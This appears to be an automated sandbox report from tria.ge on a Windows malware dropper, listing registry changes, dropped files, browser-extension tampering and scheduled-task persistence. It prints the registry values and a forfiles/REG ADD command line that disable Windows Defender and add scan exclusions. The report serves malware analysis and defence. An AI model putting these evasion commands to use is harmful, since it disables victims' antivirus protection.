Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
130s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
21/12/2022, 22:47
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
97c57dba01e051aefa8cdca5f29d20cd
-
SHA1
178fede4b249f7dbefb887003b8f36360a00ad0f
-
SHA256
6e82fdf9791c3706dbe035d98bf1ca8fedb622386ca5e57c3aa41c35a2facdc7
-
SHA512
fb95cdbe21ac00c1b2f081c43baef3c34048a3c2ddc4c02e083ee8604e3f83b2f8acea482cceeb90a6987b67d2ab80c4c53c6cac8f1a45ca7dfd30c2cdaf1c52
-
SSDEEP
196608:91OhtoK/KIBI3lyJbVf4c5X1j6IjA8xc6n1tYwaikgWaN:3OhtzKvs1FjDc2HLaik4
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LJVhNoouCIYvC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\STCeEXnoOCFBHvVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xPPqLUFFU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fFIwvsLyPfUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xPPqLUFFU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\STCeEXnoOCFBHvVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LJVhNoouCIYvC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fFIwvsLyPfUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nNTpTrwDNnPU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nNTpTrwDNnPU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 864 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 536 Install.exe 620 Install.exe 828 EpdQepo.exe 996 ZkSYWem.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\International\Geo\Nation ZkSYWem.exe -
Loads dropped DLL 12 IoCs
pid Process 1764 file.exe 536 Install.exe 536 Install.exe 536 Install.exe 536 Install.exe 620 Install.exe 620 Install.exe 620 Install.exe 864 rundll32.exe 864 rundll32.exe 864 rundll32.exe 864 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json ZkSYWem.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol EpdQepo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol EpdQepo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 ZkSYWem.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ZkSYWem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZkSYWem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D ZkSYWem.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini EpdQepo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZkSYWem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZkSYWem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D ZkSYWem.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZkSYWem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZkSYWem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 ZkSYWem.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\LJVhNoouCIYvC\uuDAhrc.xml ZkSYWem.exe File created C:\Program Files (x86)\fFIwvsLyPfUn\jaEFinx.dll ZkSYWem.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ZkSYWem.exe File created C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\dphLCVD.dll ZkSYWem.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZkSYWem.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZkSYWem.exe File created C:\Program Files (x86)\xPPqLUFFU\ofiZBaU.xml ZkSYWem.exe File created C:\Program Files (x86)\nNTpTrwDNnPU2\VFuGUlrSxXUgN.dll ZkSYWem.exe File created C:\Program Files (x86)\nNTpTrwDNnPU2\vwWmtWz.xml ZkSYWem.exe File created C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\QoRJesY.xml ZkSYWem.exe File created C:\Program Files (x86)\xPPqLUFFU\FGlSXg.dll ZkSYWem.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZkSYWem.exe File created C:\Program Files (x86)\LJVhNoouCIYvC\sBCGKyo.dll ZkSYWem.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bcmBoHFysFBidtSprQ.job schtasks.exe File created C:\Windows\Tasks\yTojJpVlyxZWLIphK.job schtasks.exe File created C:\Windows\Tasks\mvThVpxzbhgVRbG.job schtasks.exe File created C:\Windows\Tasks\diAnMdtAazTJxxqKi.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1188 schtasks.exe 1020 schtasks.exe 1736 schtasks.exe 452 schtasks.exe 560 schtasks.exe 1896 schtasks.exe 1960 schtasks.exe 2036 schtasks.exe 1276 schtasks.exe 1612 schtasks.exe 1556 schtasks.exe 1712 schtasks.exe 700 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates ZkSYWem.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-84-69-8c-52-5a\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8B43B135-4CE8-4AE5-9FCC-DF1A6483368C} ZkSYWem.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8B43B135-4CE8-4AE5-9FCC-DF1A6483368C}\WpadDecisionTime = f09468d19615d901 ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-84-69-8c-52-5a ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs ZkSYWem.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ZkSYWem.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ZkSYWem.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-84-69-8c-52-5a\WpadDecisionReason = "1" ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs ZkSYWem.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-84-69-8c-52-5a\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs ZkSYWem.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections ZkSYWem.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs ZkSYWem.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ZkSYWem.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" ZkSYWem.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8B43B135-4CE8-4AE5-9FCC-DF1A6483368C}\WpadDecisionReason = "1" ZkSYWem.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-84-69-8c-52-5a\WpadDecisionTime = f09468d19615d901 ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs ZkSYWem.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0038000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople ZkSYWem.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-84-69-8c-52-5a\WpadDecision = "0" ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8B43B135-4CE8-4AE5-9FCC-DF1A6483368C}\ba-84-69-8c-52-5a ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs ZkSYWem.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 ZkSYWem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings ZkSYWem.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1664 powershell.EXE 1664 powershell.EXE 1664 powershell.EXE 1372 powershell.EXE 1372 powershell.EXE 1372 powershell.EXE 552 powershell.EXE 552 powershell.EXE 552 powershell.EXE 1768 powershell.EXE 1768 powershell.EXE 1768 powershell.EXE 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe 996 ZkSYWem.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1664 powershell.EXE Token: SeDebugPrivilege 1372 powershell.EXE Token: SeDebugPrivilege 552 powershell.EXE Token: SeDebugPrivilege 1768 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1764 wrote to memory of 536 1764 file.exe 28 PID 1764 wrote to memory of 536 1764 file.exe 28 PID 1764 wrote to memory of 536 1764 file.exe 28 PID 1764 wrote to memory of 536 1764 file.exe 28 PID 1764 wrote to memory of 536 1764 file.exe 28 PID 1764 wrote to memory of 536 1764 file.exe 28 PID 1764 wrote to memory of 536 1764 file.exe 28 PID 536 wrote to memory of 620 536 Install.exe 29 PID 536 wrote to memory of 620 536 Install.exe 29 PID 536 wrote to memory of 620 536 Install.exe 29 PID 536 wrote to memory of 620 536 Install.exe 29 PID 536 wrote to memory of 620 536 Install.exe 29 PID 536 wrote to memory of 620 536 Install.exe 29 PID 536 wrote to memory of 620 536 Install.exe 29 PID 620 wrote to memory of 1656 620 Install.exe 31 PID 620 wrote to memory of 1656 620 Install.exe 31 PID 620 wrote to memory of 1656 620 Install.exe 31 PID 620 wrote to memory of 1656 620 Install.exe 31 PID 620 wrote to memory of 1656 620 Install.exe 31 PID 620 wrote to memory of 1656 620 Install.exe 31 PID 620 wrote to memory of 1656 620 Install.exe 31 PID 620 wrote to memory of 1856 620 Install.exe 33 PID 620 wrote to memory of 1856 620 Install.exe 33 PID 620 wrote to memory of 1856 620 Install.exe 33 PID 620 wrote to memory of 1856 620 Install.exe 33 PID 620 wrote to memory of 1856 620 Install.exe 33 PID 620 wrote to memory of 1856 620 Install.exe 33 PID 620 wrote to memory of 1856 620 Install.exe 33 PID 1656 wrote to memory of 1556 1656 forfiles.exe 35 PID 1656 wrote to memory of 1556 1656 forfiles.exe 35 PID 1656 wrote to memory of 1556 1656 forfiles.exe 35 PID 1656 wrote to memory of 1556 1656 forfiles.exe 35 PID 1656 wrote to memory of 1556 1656 forfiles.exe 35 PID 1656 wrote to memory of 1556 1656 forfiles.exe 35 PID 1656 wrote to memory of 1556 1656 forfiles.exe 35 PID 1856 wrote to memory of 1072 1856 forfiles.exe 36 PID 1856 wrote to memory of 1072 1856 forfiles.exe 36 PID 1856 wrote to memory of 1072 1856 forfiles.exe 36 PID 1856 wrote to memory of 1072 1856 forfiles.exe 36 PID 1856 wrote to memory of 1072 1856 forfiles.exe 36 PID 1856 wrote to memory of 1072 1856 forfiles.exe 36 PID 1856 wrote to memory of 1072 1856 forfiles.exe 36 PID 1556 wrote to memory of 1572 1556 cmd.exe 37 PID 1556 wrote to memory of 1572 1556 cmd.exe 37 PID 1556 wrote to memory of 1572 1556 cmd.exe 37 PID 1556 wrote to memory of 1572 1556 cmd.exe 37 PID 1556 wrote to memory of 1572 1556 cmd.exe 37 PID 1556 wrote to memory of 1572 1556 cmd.exe 37 PID 1556 wrote to memory of 1572 1556 cmd.exe 37 PID 1072 wrote to memory of 1972 1072 cmd.exe 38 PID 1072 wrote to memory of 1972 1072 cmd.exe 38 PID 1072 wrote to memory of 1972 1072 cmd.exe 38 PID 1072 wrote to memory of 1972 1072 cmd.exe 38 PID 1072 wrote to memory of 1972 1072 cmd.exe 38 PID 1072 wrote to memory of 1972 1072 cmd.exe 38 PID 1072 wrote to memory of 1972 1072 cmd.exe 38 PID 1072 wrote to memory of 2036 1072 cmd.exe 40 PID 1072 wrote to memory of 2036 1072 cmd.exe 40 PID 1072 wrote to memory of 2036 1072 cmd.exe 40 PID 1072 wrote to memory of 2036 1072 cmd.exe 40 PID 1072 wrote to memory of 2036 1072 cmd.exe 40 PID 1072 wrote to memory of 2036 1072 cmd.exe 40 PID 1072 wrote to memory of 2036 1072 cmd.exe 40 PID 1556 wrote to memory of 1632 1556 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\7zSFC2B.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Users\Admin\AppData\Local\Temp\7zS2.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
